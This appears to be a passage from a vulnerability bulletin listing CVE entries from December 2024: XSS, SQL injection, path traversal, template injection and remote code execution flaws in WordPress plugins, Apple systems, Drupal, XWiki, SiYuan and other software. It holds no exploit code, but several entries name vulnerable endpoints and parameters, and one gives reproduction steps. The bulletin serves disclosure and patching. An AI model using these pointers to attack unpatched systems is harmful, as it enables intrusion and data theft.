Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in universam UNIVERSAM allows Reflected XSS.This issue affects UNIVERSAM: from n/a through n/a. | 2024-12-13 | not yet calculated | CVE-2024-54327 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Link Nacional Invoice Payment for WooCommerce allows Reflected XSS.This issue affects Invoice Payment for WooCommerce: from n/a through 1.7.2. | 2024-12-13 | not yet calculated | CVE-2024-54328 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metup s.r.l. CleverNode Related Content allows Reflected XSS.This issue affects CleverNode Related Content: from n/a through 1.1.5. | 2024-12-13 | not yet calculated | CVE-2024-54329 |
| n/a -- n/a |
Server-Side Request Forgery (SSRF) vulnerability in Hep Hep Hurra (HHH) Hurrakify allows Server Side Request Forgery.This issue affects Hurrakify: from n/a through 2.4. | 2024-12-13 | not yet calculated | CVE-2024-54330 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in silverplugins217 Check Pincode For Woocommerce allows Reflected XSS.This issue affects Check Pincode For Woocommerce: from n/a through 1.1. | 2024-12-13 | not yet calculated | CVE-2024-54333 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zeshan B Quran Phrases About Most People Shortcodes allows DOM-Based XSS.This issue affects Quran Phrases About Most People Shortcodes: from n/a through 1.4. | 2024-12-13 | not yet calculated | CVE-2024-54334 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZebraSoft Monaco ImmoToolBox Connect allows Reflected XSS.This issue affects ImmoToolBox Connect: from n/a through 1.3.3. | 2024-12-13 | not yet calculated | CVE-2024-54335 |
| n/a -- n/a |
Authentication Bypass Using an Alternate Path or Channel vulnerability in Projectopia Projectopia allows Authentication Bypass.This issue affects Projectopia: from n/a through 5.1.7. | 2024-12-13 | not yet calculated | CVE-2024-54336 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in DevriX DX Dark Site allows Stored XSS.This issue affects DX Dark Site: from n/a through 1.0.1. | 2024-12-13 | not yet calculated | CVE-2024-54337 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Christer Fernstrom Hello Event Widgets For Elementor allows DOM-Based XSS.This issue affects Hello Event Widgets For Elementor: from n/a through 1.0.2. | 2024-12-13 | not yet calculated | CVE-2024-54338 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jbd7 geoFlickr allows Reflected XSS.This issue affects geoFlickr: from n/a through 1.3. | 2024-12-13 | not yet calculated | CVE-2024-54339 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sylvia van Os Simple Presenter allows Reflected XSS.This issue affects Simple Presenter: from n/a through 1.5.1. | 2024-12-13 | not yet calculated | CVE-2024-54340 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LabelGrid LabelGrid Tools allows Reflected XSS.This issue affects LabelGrid Tools: from n/a through 1.3.58. | 2024-12-13 | not yet calculated | CVE-2024-54341 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in STAGGS Staggs Product Configurator for WooCommerce allows Reflected XSS.This issue affects Staggs Product Configurator for WooCommerce: from n/a through 2.0.0. | 2024-12-13 | not yet calculated | CVE-2024-54342 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Howard Ehrenberg Connect Contact Form 7 to Constant Contact allows Reflected XSS.This issue affects Connect Contact Form 7 to Constant Contact: from n/a through 1.4. | 2024-12-13 | not yet calculated | CVE-2024-54343 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood WP Quick Shop allows Reflected XSS.This issue affects WP Quick Shop: from n/a through 1.3.1. | 2024-12-13 | not yet calculated | CVE-2024-54344 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SKT Themes Bicycleshop allows DOM-Based XSS.This issue affects Bicycleshop: from n/a through 1.5. | 2024-12-13 | not yet calculated | CVE-2024-54345 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SKT Themes Barter allows DOM-Based XSS.This issue affects Barter: from n/a through 1.6. | 2024-12-13 | not yet calculated | CVE-2024-54346 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BAKKBONE Australia FloristPress allows Reflected XSS.This issue affects FloristPress: from n/a through 7.2.0. | 2024-12-13 | not yet calculated | CVE-2024-54347 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mashiurz.com Plain Post allows Stored XSS.This issue affects Plain Post: from n/a through 1.0.3. | 2024-12-13 | not yet calculated | CVE-2024-54349 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Tom Landis Fancy Roller Scroller allows Stored XSS.This issue affects Fancy Roller Scroller: from n/a through 1.4.0. | 2024-12-13 | not yet calculated | CVE-2024-54351 |
| n/a -- n/a |
An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An encrypted volume may be accessed by a different user without prompting for the password. | 2024-12-12 | not yet calculated | CVE-2024-54466 |
| n/a -- n/a |
This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sonoma 14.7.1, macOS Ventura 13.7.1. A malicious application may be able to leak a user's credentials. | 2024-12-12 | not yet calculated | CVE-2024-54471 |
| n/a -- n/a |
The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to access user-sensitive data. | 2024-12-12 | not yet calculated | CVE-2024-54476 |
| n/a -- n/a |
This issue was addressed by enabling hardened runtime. This issue is fixed in macOS Sequoia 15.2. A local attacker may gain access to user's Keychain items. | 2024-12-12 | not yet calculated | CVE-2024-54490 |
| n/a -- n/a |
The issue was resolved by sanitizing logging This issue is fixed in macOS Sequoia 15.2. A malicious application may be able to determine a user's current location. | 2024-12-12 | not yet calculated | CVE-2024-54491 |
| n/a -- n/a |
This issue was addressed by using HTTPS when sending information over the network. This issue is fixed in macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, iPadOS 17.7.3, visionOS 2.2. An attacker in a privileged network position may be able to alter network traffic. | 2024-12-12 | not yet calculated | CVE-2024-54492 |
| n/a -- n/a |
The issue was addressed with improved permissions logic. This issue is fixed in macOS Sequoia 15.2, macOS Sonoma 14.7.2. An app may be able to modify protected parts of the file system. | 2024-12-12 | not yet calculated | CVE-2024-54495 |
| n/a -- n/a |
The issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. Processing a maliciously crafted file may lead to a denial of service. | 2024-12-12 | not yet calculated | CVE-2024-54501 |
| n/a -- n/a |
The issue was addressed with improved checks. This issue is fixed in watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, Safari 18.2, iOS 18.2 and iPadOS 18.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2024-12-12 | not yet calculated | CVE-2024-54502 |
| n/a -- n/a |
The issue was addressed with improved checks. This issue is fixed in watchOS 11.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to break out of its sandbox. | 2024-12-12 | not yet calculated | CVE-2024-54514 |
| n/a -- n/a |
A logic issue was addressed with improved file handling. This issue is fixed in macOS Sequoia 15.2. A malicious app may be able to access arbitrary files. | 2024-12-12 | not yet calculated | CVE-2024-54524 |
| n/a -- n/a |
A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to execute arbitrary code with kernel privileges. | 2024-12-12 | not yet calculated | CVE-2024-54529 |
| n/a -- n/a |
COMFAST CF-WR630AX v2.7.0.2 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root. | 2024-12-10 | not yet calculated | CVE-2024-54751 |
| n/a -- n/a |
A SQL Injection vulnerability was found in /preschool/admin/password-recovery.php in PHPGurukul Pre-School Enrollment System Project v1.0, which allows remote attackers to execute arbitrary code via the mobileno parameter. | 2024-12-12 | not yet calculated | CVE-2024-54810 |
| n/a -- n/a |
A SQL injection vulnerability in /index.php in PHPGurukul Park Ticketing Management System v1.0 allows an attacker to execute arbitrary SQL commands via the "login" parameter. | 2024-12-12 | not yet calculated | CVE-2024-54811 |
| n/a -- n/a |
A SQL injection vulnerability was found in phpgurukul Online Nurse Hiring System v1.0 in /admin/password-recovery.php via the mobileno parameter. | 2024-12-12 | not yet calculated | CVE-2024-54842 |
| n/a -- n/a |
Kashipara E-learning Management System v1.0 is vulnerable to Remote Code Execution via File Upload in /teacher_avatar.php. | 2024-12-09 | not yet calculated | CVE-2024-54918 |
| n/a -- n/a |
A SQL Injection was found in /student_signup.php in kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the username, firstname, lastname, and class_id parameters. | 2024-12-09 | not yet calculated | CVE-2024-54921 |
| n/a -- n/a |
A SQL Injection vulnerability was found in /admin/edit_teacher.php in kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the department parameter. | 2024-12-09 | not yet calculated | CVE-2024-54923 |
| n/a -- n/a |
A SQL Injection was found in /admin/edit_content.php in kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the title and content parameters. | 2024-12-09 | not yet calculated | CVE-2024-54924 |
| n/a -- n/a |
A SQL Injection was found in /remove_sent_message.php in kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the id parameter. | 2024-12-09 | not yet calculated | CVE-2024-54925 |
| n/a -- n/a |
Kashipara E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_users.php. | 2024-12-09 | not yet calculated | CVE-2024-54927 |
| n/a -- n/a |
kashipara E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_teacher.php, | 2024-12-09 | not yet calculated | CVE-2024-54928 |
| n/a -- n/a |
A SQL Injection was found in /admin/delete_event.php in kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the id parameter. | 2024-12-09 | not yet calculated | CVE-2024-54931 |
| n/a -- n/a |
Kashipara E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_department.php. | 2024-12-09 | not yet calculated | CVE-2024-54932 |
| n/a -- n/a |
Kashipara E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_class.php. | 2024-12-09 | not yet calculated | CVE-2024-54934 |
| n/a -- n/a |
A Directory Listing issue was found in Kashipara E-Learning Management System v1.0, which allows remote attackers to access sensitive files and directories via /admin/uploads. | 2024-12-09 | not yet calculated | CVE-2024-54938 |
| n/a -- n/a |
A SQL Injection vulnerability was found in /admin/index.php in phpgurukul Online Nurse Hiring System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the username parameter. | 2024-12-12 | not yet calculated | CVE-2024-55099 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) in Avenwu Whistle v.2.9.90 and before allows attackers to perform malicious API calls, resulting in the execution of arbitrary code on the victim's machine. | 2024-12-10 | not yet calculated | CVE-2024-55500 |
| n/a -- n/a |
Missing input validation in the ORing IAP-420 web-interface allows stored Cross-Site Scripting (XSS).This issue affects IAP-420 version 2.01e and below. | 2024-12-10 | not yet calculated | CVE-2024-55544 |
| n/a -- n/a |
Missing input validation in the ORing IAP-420 web-interface allows Cross-Site Scripting (XSS).This issue affects IAP-420 version 2.01e and below. | 2024-12-10 | not yet calculated | CVE-2024-55545 |
| n/a -- n/a |
Missing input validation in the ORing IAP-420 web-interface allows stored Cross-Site Scripting (XSS).This issue affects IAP-420 version 2.01e and below. | 2024-12-10 | not yet calculated | CVE-2024-55546 |
| n/a -- n/a |
SNMP objects in NET-SNMP used in ORing IAP-420 allows Command Injection. This issue affects IAP-420: through 2.01e. | 2024-12-10 | not yet calculated | CVE-2024-55547 |
| n/a -- n/a |
Improper check of password character lenght in ORing IAP-420 allows a forced deadlock. This issue affects IAP-420: through 2.01e. | 2024-12-10 | not yet calculated | CVE-2024-55548 |
| n/a -- n/a |
Mitel MiCollab through 9.8 SP2 could allow an authenticated attacker with administrative privilege to conduct a local file read, due to insufficient input sanitization. A successful exploit could allow the authenticated admin attacker to access resources that are constrained to the admin access level, and the disclosure is limited to non-sensitive system information. This vulnerability does not allow file modification or privilege escalation. | 2024-12-10 | not yet calculated | CVE-2024-55550 |
| n/a -- n/a |
Bitcoin Core through 27.2 allows transaction-relay jamming via an off-chain protocol attack, a related issue to CVE-2024-52913. For example, the outcome of an HTLC (Hashed Timelock Contract) can be changed because a flood of transaction traffic prevents propagation of certain Lightning channel transactions. | 2024-12-09 | not yet calculated | CVE-2024-55563 |
| n/a -- n/a |
The POSIX::2008 package before 0.24 for Perl has a potential _execve50c env buffer overflow. | 2024-12-09 | not yet calculated | CVE-2024-55564 |
| n/a -- n/a |
nanoid (aka Nano ID) before 5.0.9 mishandles non-integer values. 3.3.8 is also a fixed version. | 2024-12-09 | not yet calculated | CVE-2024-55565 |
| n/a -- n/a |
ColPack 1.0.10 through 9a7293a has a predictable temporary file (located under /tmp with a name derived from an unseeded RNG). The impact can be overwriting files or making ColPack graphing unavailable to other users. | 2024-12-09 | not yet calculated | CVE-2024-55566 |
| n/a -- n/a |
Zammad before 6.4.1 places sensitive data (such as auth_microsoft_office365_credentials and application_secret) in log files. | 2024-12-09 | not yet calculated | CVE-2024-55578 |
| n/a -- n/a |
An issue was discovered in Qlik Sense Enterprise for Windows before November 2024 IR. An unprivileged user with network access may be able to create connection objects that trigger execution of arbitrary EXE files. This is fixed in November 2024 IR, May 2024 Patch 10, February 2024 Patch 14, November 2023 Patch 16, August 2023 Patch 16, May 2023 Patch 18, and February 2023 Patch 15. | 2024-12-09 | not yet calculated | CVE-2024-55579 |
| n/a -- n/a |
An issue was discovered in Qlik Sense Enterprise for Windows before November 2024 IR. Unprivileged users with network access may be able to execute remote commands that could cause high availability damages, including high integrity and confidentiality risks. This is fixed in November 2024 IR, May 2024 Patch 10, February 2024 Patch 14, November 2023 Patch 16, August 2023 Patch 16, May 2023 Patch 18, and February 2023 Patch 15. | 2024-12-09 | not yet calculated | CVE-2024-55580 |
| n/a -- n/a |
Oxide before 6 has unencrypted Control Plane datastores. | 2024-12-09 | not yet calculated | CVE-2024-55582 |
| n/a -- n/a |
Nette Database through 3.2.4 allows SQL injection in certain situations involving an untrusted filter that is directly passed to the where method. NOTE: the vendor's position is that this is intended behavior. | 2024-12-10 | not yet calculated | CVE-2024-55586 |
| n/a -- n/a |
python-libarchive through 4.2.1 allows directory traversal (to create files) in extract in zip.py for ZipFile.extractall and ZipFile.extract. | 2024-12-12 | not yet calculated | CVE-2024-55587 |
| n/a -- n/a |
Hugo is a static site generator. Starting in version 0.123.0 and prior to version 0.139.4, some HTML attributes in Markdown in the internal templates listed below not escaped in internal render hooks. Those whoa re impacted are Hugo users who do not trust their Markdown content files and are using one or more of these templates: `_default/_markup/render-link.html` from `v0.123.0`; `_default/_markup/render-image.html` from `v0.123.0`; `_default/_markup/render-table.html` from `v0.134.0`; and/or `shortcodes/youtube.html` from `v0.125.0`. This issue is patched in v0.139.4. As a workaround, one may replace an affected component with user defined templates or disable the internal templates. | 2024-12-09 | not yet calculated | CVE-2024-55601 |
| n/a -- n/a |
PwnDoc is a penetration test report generator. Prior to commit 1d4219c596f4f518798492e48386a20c6e9a2fe6, an authenticated user who is able to update and download templates can inject path traversal (`../`) sequences into the file extension property to read arbitrary files on the system. Commit 1d4219c596f4f518798492e48386a20c6e9a2fe6 contains a patch for the issue. | 2024-12-10 | not yet calculated | CVE-2024-55602 |
| n/a -- n/a |
Improper Authorization vulnerability in Apache Superset. On Postgres analytic databases an attacker with SQLLab access can craft a specially designed SQL DML statement that is Incorrectly identified as a read-only query, enabling its execution. Non postgres analytics database connections and postgres analytics database connections set with a readonly user (advised) are not vulnerable. This issue affects Apache Superset: before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue. | 2024-12-12 | not yet calculated | CVE-2024-55633 |
| n/a -- n/a |
A vulnerability in Drupal Core allows Privilege Escalation.This issue affects Drupal Core: from 8.0.0 before 10.2.11, from 10.3.0 before 10.3.9, from 11.0.0 before 11.0.8. | 2024-12-10 | not yet calculated | CVE-2024-55634 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Drupal Core allows Cross-Site Scripting (XSS).This issue affects Drupal Core: from 7.0 before 7.102. | 2024-12-10 | not yet calculated | CVE-2024-55635 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Drupal Core allows Object Injection.This issue affects Drupal Core: from 8.0.0 before 10.2.11, from 10.3.0 before 10.3.9, from 11.0.0 before 11.0.8. | 2024-12-10 | not yet calculated | CVE-2024-55636 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Drupal Core allows Object Injection.This issue affects Drupal Core: from 8.0.0 before 10.2.11, from 10.3.0 before 10.3.9, from 11.0.0 before 11.0.8. | 2024-12-10 | not yet calculated | CVE-2024-55637 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Drupal Core allows Object Injection.This issue affects Drupal Core: from 7.0 before 7.102, from 8.0.0 before 10.2.11, from 10.3.0 before 10.3.9. | 2024-12-10 | not yet calculated | CVE-2024-55638 |
| n/a -- n/a |
PenDoc is a penetration testing reporting application. Prior to commit 1d4219c596f4f518798492e48386a20c6e9a2fe6, an attacker can write a malicious docx template containing expressions that escape the JavaScript sandbox to execute arbitrary code on the system. An attacker who can control the contents of the template document is able to execute arbitrary code on the system. By default, only users with the `admin` role are able to create or update templates. Commit 1d4219c596f4f518798492e48386a20c6e9a2fe6 patches the issue. | 2024-12-12 | not yet calculated | CVE-2024-55652 |
| n/a -- n/a |
PwnDoc is a penetration test report generator. In versions up to and including 0.5.3, an authenticated user is able to crash the backend by raising a `UnhandledPromiseRejection` on audits which exits the backend. The user doesn't need to know the audit id, since a bad audit id will also raise the rejection. With the backend being unresponsive, the whole application becomes unusable for all users of the application. As of time of publication, no known patches are available. | 2024-12-10 | not yet calculated | CVE-2024-55653 |
| n/a -- n/a |
sigstore-python is a Python tool for generating and verifying Sigstore signatures. Versions of sigstore-python newer than 2.0.0 but prior to 3.6.0 perform insufficient validation of the "integration time" present in "v2" and "v3" bundles during the verification flow: the "integration time" is verified *if* a source of signed time (such as an inclusion promise) is present, but is otherwise trusted if no source of signed time is present. This does not affect "v1" bundles, as the "v1" bundle format always requires an inclusion promise. Sigstore uses signed time to support verification of signatures made against short-lived signing keys. The impact and severity of this weakness is *low*, as Sigstore contains multiple other enforcing components that prevent an attacker who modifies the integration timestamp within a bundle from impersonating a valid signature. In particular, an attacker who modifies the integration timestamp can induce a Denial of Service, but in no different manner than already possible with bundle access (e.g. modifying the signature itself such that it fails to verify). Separately, an attacker could upload a *new* entry to the transparency service, and substitute their new entry's time. However, this would still be rejected at validation time, as the new entry's (valid) signed time would be outside the validity window of the original signing certificate and would nonetheless render the attacker auditable. | 2024-12-10 | not yet calculated | CVE-2024-55655 |
| n/a -- n/a |
SiYuan is a personal knowledge management system. Prior to version 3.1.16, an arbitrary file read vulnerability exists in Siyuan's `/api/template/render` endpoint. The absence of proper validation on the path parameter allows attackers to access sensitive files on the host system. Version 3.1.16 contains a patch for the issue. | 2024-12-12 | not yet calculated | CVE-2024-55657 |
| n/a -- n/a |
SiYuan is a personal knowledge management system. Prior to version 3.1.16, SiYuan's /api/export/exportResources endpoint is vulnerable to arbitary file read via path traversal. It is possible to manipulate the paths parameter to access and download arbitrary files from the host system by traversing the workspace directory structure. Version 3.1.16 contains a patch for the issue. | 2024-12-12 | not yet calculated | CVE-2024-55658 |
| n/a -- n/a |
SiYuan is a personal knowledge management system. Prior to version 3.1.16, the `/api/asset/upload` endpoint in Siyuan is vulnerable to both arbitrary file write to the host and stored cross-site scripting (via the file write). Version 3.1.16 contains a patch for the issue. | 2024-12-12 | not yet calculated | CVE-2024-55659 |
| n/a -- n/a |
SiYuan is a personal knowledge management system. Prior to version 3.1.16, SiYuan's `/api/template/renderSprig` endpoint is vulnerable to Server-Side Template Injection (SSTI) through the Sprig template engine. Although the engine has limitations, it allows attackers to access environment variables. Version 3.1.16 contains a patch for the issue. | 2024-12-12 | not yet calculated | CVE-2024-55660 |
| n/a -- n/a |
Laravel Pulse is a real-time application performance monitoring tool and dashboard for Laravel applications. A vulnerability has been discovered in Laravel Pulse prior to version 1.3.1 that could allow remote code execution through the public `remember()` method in the `Laravel\Pulse\Livewire\Concerns\RemembersQueries` trait. This method is accessible via Livewire components and can be exploited to call arbitrary callables within the application. An authenticated user with access to Laravel Pulse dashboard can execute arbitrary code by calling any function or static method in which the callable is a function or static method and the callable has no parameters or no strict parameter types. The vulnerable to component is `remember(callable $query, string $key = '')` method in `Laravel\Pulse\Livewire\Concerns\RemembersQueries`, and the vulnerability affects all Pulse card components that use this trait. Version 1.3.1 contains a patch. | 2024-12-13 | not yet calculated | CVE-2024-55661 |
| n/a -- n/a |
XWiki Platform is a generic wiki platform. Starting in version 3.3-milestone-1 and prior to versions 15.10.9 and 16.3.0, on instances where `Extension Repository Application` is installed, any user can execute any code requiring `programming` rights on the server. This vulnerability has been fixed in XWiki 15.10.9 and 16.3.0. Since `Extension Repository Application` is not mandatory, it can be safely disabled on instances that do not use it as a workaround. It is also possible to manually apply the patches from commit 8659f17d500522bf33595e402391592a35a162e8 to the page `ExtensionCode.ExtensionSheet` and to the page `ExtensionCode.ExtensionAuthorsDisplayer`. | 2024-12-12 | not yet calculated | CVE-2024-55662 |
| n/a -- n/a |
XWiki Platform is a generic wiki platform. Starting in version 11.10.6 and prior to versions 13.10.5 and 14.3-rc-1, in `getdocument.vm`; the ordering of the returned documents is defined from an unsanitized request parameter (request.sort) and can allow any user to inject HQL. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This has been patched in 13.10.5 and 14.3-rc-1. There is no known workaround, other than upgrading XWiki. | 2024-12-12 | not yet calculated | CVE-2024-55663 |
| n/a -- n/a |
http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 5.41.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. Version 5.41.0.0 contains a patch for the issue. | 2024-12-12 | not yet calculated | CVE-2024-55875 |
| n/a -- n/a |
XWiki Platform is a generic wiki platform. Starting in version 1.2-milestone-2 and prior to versions 15.10.9 and 16.3.0, any user with an account on the main wiki could run scheduling operations on subwikis. To reproduce, as a user on the main wiki without any special right, view the document `Scheduler.WebHome` in a subwiki. Then, click on any operation (*e.g.,* Trigger) on any job. If the operation is successful, then the instance is vulnerable. This has been patched in XWiki 15.10.9 and 16.3.0. As a workaround, those who have subwikis where the Job Scheduler is enabled can edit the objects on `Scheduler.WebPreferences` to match the patch. | 2024-12-12 | not yet calculated | CVE-2024-55876 |
| n/a -- n/a |
XWiki Platform is a generic wiki platform. Starting in version 9.7-rc-1 and prior to versions 15.10.11, 16.4.1, and 16.5.0, any user with an account can perform arbitrary remote code execution by adding instances of `XWiki.WikiMacroClass` to any page. This compromises the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been fixed in XWiki 15.10.11, 16.4.1 and 16.5.0. It is possible to manually apply the patch to the page `XWiki.XWikiSyntaxMacrosList` as a workaround. | 2024-12-12 | not yet calculated | CVE-2024-55877 |
| n/a -- n/a |
SimpleXLSX is software for parsing and retrieving data from Excel XLSx files. Starting in version 1.0.12 and prior to version 1.1.12, when calling the extended toHTMLEx method, it is possible to execute arbitrary JavaScript code. Version 1.1.12 fixes the issue. As a workaround, don't use direct publication via toHTMLEx. | 2024-12-12 | not yet calculated | CVE-2024-55878 |
| n/a -- n/a |
XWiki Platform is a generic wiki platform. Starting in version 2.3 and prior to versions 15.10.9, 16.3.0, any user with script rights can perform arbitrary remote code execution by adding instances of `XWiki.ConfigurableClass` to any page. This compromises the confidentiality, integrity and availability of the whole XWiki installation. This has been patched in XWiki 15.10.9 and 16.3.0. No known workarounds are available except upgrading. | 2024-12-12 | not yet calculated | CVE-2024-55879 |
| n/a -- n/a |
In the Mullvad VPN client 2024.6 (Desktop), 2024.8 (iOS), and 2024.8-beta1 (Android), the exception-handling alternate stack can be exhausted, leading to heap-based out-of-bounds writes in enable() in exception_logging/unix.rs, aka MLLVD-CR-24-01. NOTE: achieving code execution is considered non-trivial. | 2024-12-12 | not yet calculated | CVE-2024-55884 |
| n/a -- n/a |
beego is an open-source web framework for the Go programming language. Versions of beego prior to 2.3.4 use MD5 as a hashing algorithm. MD5 is no longer considered secure against well-funded opponents due to its vulnerability to collision attacks. Version 2.3.4 replaces MD5 with SHA256. | 2024-12-12 | not yet calculated | CVE-2024-55885 |
| n/a -- n/a |
OpenSearch Data Prepper is a component of the OpenSearch project that accepts, filters, transforms, enriches, and routes data at scale. A vulnerability exists in the OpenTelemetry Logs source in Data Prepper starting inversion 2.1.0 and prior to version 2.10.2 where some custom authentication plugins will not perform authentication. This allows unauthorized users to ingest OpenTelemetry Logs data under certain conditions. This vulnerability does not affect the built-in `http_basic` authentication provider in Data Prepper. Pipelines which use the `http_basic` authentication provider continue to require authentication. The vulnerability exists only for custom implementations of Data Prepper's `GrpcAuthenticationProvider` authentication plugin which implement the `getHttpAuthenticationService()` method instead of `getAuthenticationInterceptor()`. Data Prepper 2.10.2 contains a fix for this issue. For those unable to upgrade, one may use the built-in `http_basic` authentication provider in Data Prepper and/or add an authentication proxy in front of one's Data Prepper instances running the OpenTelemetry Logs source. | 2024-12-12 | not yet calculated | CVE-2024-55886 |
| n/a -- n/a |
Ucum-java is a FHIR Java library providing UCUM Services. In versions prior to 1.0.9, XML parsing performed by the UcumEssenceService is vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag could produce XML containing data from the host system. This impacts use cases where ucum is being used to within a host where external clients can submit XML. Release 1.0.9 of Ucum-java fixes this vulnerability. As a workaround, ensure that the source xml for instantiating UcumEssenceService is trusted. | 2024-12-13 | not yet calculated | CVE-2024-55887 |
| n/a -- n/a |
Hush Line is an open-source whistleblower management system. Starting in version 0.1.0 and prior to version 0.3.5, the productions server appeared to have been misconfigured and missed providing any content security policy or security headers. This could result in bypassing of cross-site scripting filters. Version 0.3.5 fixed the issue. | 2024-12-12 | not yet calculated | CVE-2024-55888 |
| n/a -- n/a |
phpMyFAQ is an open source FAQ web application. Prior to version 3.2.10, a vulnerability exists in the FAQ Record component where a privileged attacker can trigger a file download on a victim's machine upon page visit by embedding it in an <iframe> element without user interaction or explicit consent. Version 3.2.10 fixes the issue. | 2024-12-13 | not yet calculated | CVE-2024-55889 |
| n/a -- n/a |
D-Tale is a visualizer for pandas data structures. Prior to version 3.16.1, users hosting D-Tale publicly can be vulnerable to remote code execution allowing attackers to run malicious code on the server. Users should upgrade to version 3.16.1 where the `update-settings` endpoint blocks the ability for users to update the `enable_custom_filters` flag. The only workaround for versions earlier than 3.16.1 is to only host D-Tale to trusted users. | 2024-12-13 | not yet calculated | CVE-2024-55890 |
| n/a -- n/a |
An issue was discovered in the Graphics::ColorNames package before 3.2.0 for Perl. There is an ambiguity between modules and filenames that can lead to HTML injection by an attacker who can create a file in the current working directory. | 2024-12-13 | not yet calculated | CVE-2024-55918 |
| n/a -- n/a |
Playloom Engine is an open-source, high-performance game development engine. Engine Beta v0.0.1 has a security vulnerability related to data storage, specifically when using the collaboration features. When collaborating with another user, they may have access to personal information you have entered into the software. This poses a risk to user privacy. The maintainers of Playloom Engine have temporarily disabled the collaboration feature until a fix can be implemented. When Engine Beta v0.0.2 is released, it is expected to contain a patch addressing this issue. Users should refrain from using the collaboration feature in the meantime. | 2024-12-13 | not yet calculated | CVE-2024-55946 |
| n/a -- n/a |
In Cleo Harmony before 5.8.0.24, VLTrader before 5.8.0.24, and LexiCom before 5.8.0.24, an unauthenticated user can import and execute arbitrary Bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory. | 2024-12-13 | not yet calculated | CVE-2024-55956 |
| n/a -- n/a |
DocIO in Syncfusion Essential Studio for ASP.NET MVC before 27.1.55 throws XMLException during the resaving of a DOCX document with an external reference XML, aka I640714. | 2024-12-15 | not yet calculated | CVE-2024-55969 |
| n/a -- n/a |
File Manager in Syncfusion Essential Studio for ASP.NET MVC before 27.1.55 has a traversal issue that is related to the request parameter, aka I644734. | 2024-12-15 | not yet calculated | CVE-2024-55970 |
| n/a -- n/a |
An issue was discovered in FastNetMon Community Edition through 1.2.7. The sFlow v5 plugin allows remote attackers to cause a denial of service (application crash) via a crafted packet that specifies many sFlow samples. | 2024-12-15 | not yet calculated | CVE-2024-56072 |
| n/a -- n/a |
An issue was discovered in FastNetMon Community Edition through 1.2.7. Zero-length templates for Netflow v9 allow remote attackers to cause a denial of service (divide-by-zero error and application crash). | 2024-12-15 | not yet calculated | CVE-2024-56073 |
